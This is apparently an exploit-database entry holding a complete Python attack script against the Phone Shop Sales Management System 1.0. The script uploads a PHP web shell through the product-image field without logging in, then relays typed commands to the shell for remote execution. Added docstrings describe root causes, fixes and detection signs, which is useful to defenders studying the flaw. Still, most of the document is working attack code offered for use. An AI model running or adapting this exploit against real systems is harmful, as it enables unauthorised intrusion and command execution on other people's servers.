## https://sploitus.com/exploit?id=PACKETSTORM:162241
# Exploit Title: Phone Shop Sales Management System - Arbitrary File Upload (Unauthenticated)  
# Date: 20/04/21  
# Exploit Author: Richard Jones  
# Vendor Homepage: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html  
# Version: 1.0  
# Tested on: Windows 10 build 19041 + xampp 3.2.4  
  
import requests  
import sys  
  
# Host running the application; the default points at a local lab instance.
IP = "127.0.0.1"  # CHANGE ME

# Product-creation handler. The script calls it on a fresh session with no
# login step, which matches the "Unauthenticated" in the advisory title.
ADDURL = f"http://{IP}/osms/Execute/ExAddProduct.php"

# Where the script expects the uploaded file to be served from: a directory
# under the web root, with the client-supplied name and .php extension kept.
CALLSHELLURL = f"http://{IP}/osms/assets/img/Product_Uploaded/rev.php"

# One HTTP session shared by both requests; no credentials are set on it.
s = requests.Session()
  
def postShell():
    """Submit the add-product form with a PHP file in the image field.

    Posts to ADDURL over the shared session ``s`` without logging in first.
    The ``ProductImage`` part is named ``rev.php`` and carries a one-line PHP
    script instead of an image. The script later fetches it from
    CALLSHELLURL, which implies the server stores it under the web root with
    its name intact.

    Returns:
        True when the response body contains the application's success
        message, False otherwise.

    Defensive notes:
        * Root causes visible from this request: nothing authenticates the
          caller of the handler, and nothing restricts the extension or
          content of the uploaded file.
        * Fixes: require an authenticated session, accept only known image
          types (checked by content, not by the client-supplied name or
          MIME type), generate the stored filename server-side, and keep
          the upload directory non-executable or outside the web root.
        * Detection: multipart POSTs to ExAddProduct.php that arrive
          without a session cookie, a part ``filename`` ending in ``.php``,
          and new ``.php`` files under assets/img/Product_Uploaded/.
    """
    # Every field gets the same dummy value; key order matches the original
    # form so the encoded body is unchanged.
    form_fields = dict.fromkeys(
        (
            "ProductName",
            "BrandName",
            "ProductPrice",
            "Quantity",
            "TotalPrice",
            "DisplaySize",
            "OperatingSystem",
            "Processor",
            "InternalMemory",
            "RAM",
            "CameraDescription",
            "BatteryLife",
            "Weight",
            "Model",
            "Dimension",
            "date2",
            "Description",
            "_wysihtml5_mode",
        ),
        "1",
    )
    # The two price fields are sent as integers rather than strings.
    form_fields["ProductPrice"] = 1
    form_fields["TotalPrice"] = 1

    # (filename, content, content type) for the multipart file part.
    upload = {
        'ProductImage': (
            "rev.php",
            "<?php system($_GET['c']);?>",
            "application/octet-stream",
        ),
    }

    response = s.post(ADDURL, files=upload, data=form_fields)

    return "The product is successfully added" in response.text
  
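def runWebShell():
    """Prompt for input in a loop and relay each line to the uploaded file.

    Each line read from the terminal is appended as the ``c`` query parameter
    of a GET to CALLSHELLURL, and the response body is printed. Typing
    ``exit`` or pressing Ctrl-C ends the process. ``verify=False`` has no
    effect here because CALLSHELLURL is a plain ``http://`` URL.

    Raises:
        Exception: "Cmd error" when a response status is anything but 200.

    Defensive notes:
        On the server this shows up as repeated GETs for a ``.php`` file
        inside the image upload directory (assets/img/Product_Uploaded/)
        with a ``c`` query parameter, and as child processes spawned by the
        web server's PHP worker. Both are reliable things to alert on, and
        denying script execution in the upload directory stops the requests
        from doing anything.
    """
    try:
        while True:
            cmd = input("\033[32;1m" + "$: " + "\033[0m")
            if cmd == "exit":
                sys.exit()
            r = s.get(f"{CALLSHELLURL}?c={cmd}", verify=False)
            if r.status_code == 200:
                print(r.text)
            else:
                raise Exception("Cmd error")
    # The except clause must name the class. The original wrote
    # ``except KeyboardInterrupt():``, which matches against an instance and
    # makes Ctrl-C end in a TypeError traceback instead of a clean exit.
    except KeyboardInterrupt:
        sys.exit()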
  
def banner():
    """Return the script's ASCII-art title as one multi-line string.

    Purely cosmetic: the text is printed once at start-up and plays no part
    in the requests the script sends.
    """
    return r"""__________.__ _________.__ _________ .__ _____ _________   
\______ \ |__ ____ ____ ____ / _____/| |__ ____ ______ / _____/____ | | ____ ______ / \ / _____/   
| ___/ | \ / _ \ / \_/ __ \ \_____ \ | | \ / _ \\____ \ \_____ \\__ \ | | _/ __ \ / ___/ / \ / \ \_____ \   
| | | Y ( <_> ) | \ ___/ / \| Y ( <_> ) |_> > / \/ __ \| |_\ ___/ \___ \ / Y \ / \   
|____| |___| /\____/|___| /\___ > /_______ /|___| /\____/| __/ /_______ (____ /____/\___ >____ > \____|__ / /\ /_______ / /\   
\/ \/ \/ \/ \/ |__| \/ \/ \/ \/ \/ \/ \/ \/ """
  
def main():
    """Print the banner and credit line, send the upload, then open the prompt.

    The interactive loop starts only when postShell() saw the application's
    success message in the upload response; otherwise the script ends after
    the "Sending" line.
    """
    reset = "\033[0m"

    print("\033[34;1m" + banner() + reset)
    print("\033[32;1m" + "Created by Richard Jones 20/04/2021" + reset + "\n")
    print("\033[72;1m" + "[+] Sending WebShell..." + reset)

    if not postShell():
        return

    print("\033[72;1m" + "[+] Calling WebShell..." + reset)
    runWebShell()


if __name__ == "__main__":
    main()